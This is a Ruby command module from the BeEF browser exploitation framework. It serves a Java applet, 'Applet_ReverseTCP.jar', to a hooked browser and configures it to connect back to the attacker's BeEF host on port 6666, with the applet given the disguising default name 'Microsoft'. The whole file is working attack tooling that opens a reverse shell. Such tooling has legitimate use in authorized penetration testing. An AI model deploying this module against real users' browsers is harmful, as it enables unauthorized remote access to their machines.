#
# Copyright (c) 2006-2024 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Java_payload < BeEF::Core::Command
  def pre_send
    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
  end

  def self.options
    @configuration = BeEF::Core::Configuration.instance
    beef_host = @configuration.beef_host
    [
      { 'name' => 'conn', 'ui_label' => 'Payload', 'value' => 'ReverseTCP' },
      { 'name' => 'cbHost', 'ui_label' => 'Connect Back to Host', 'value' => beef_host },
      { 'name' => 'cbPort', 'ui_label' => 'Connect Back to Port', 'value' => '6666' },
      { 'name' => 'applet_id', 'ui_label' => 'Applet id', 'value' => rand(32**20).to_s(32) },
      { 'name' => 'applet_name', 'ui_label' => 'Applet name', 'value' => 'Microsoft' }
    ]
  end

  def post_execute
    save({ 'result' => @datastore['result'] })
  end
end
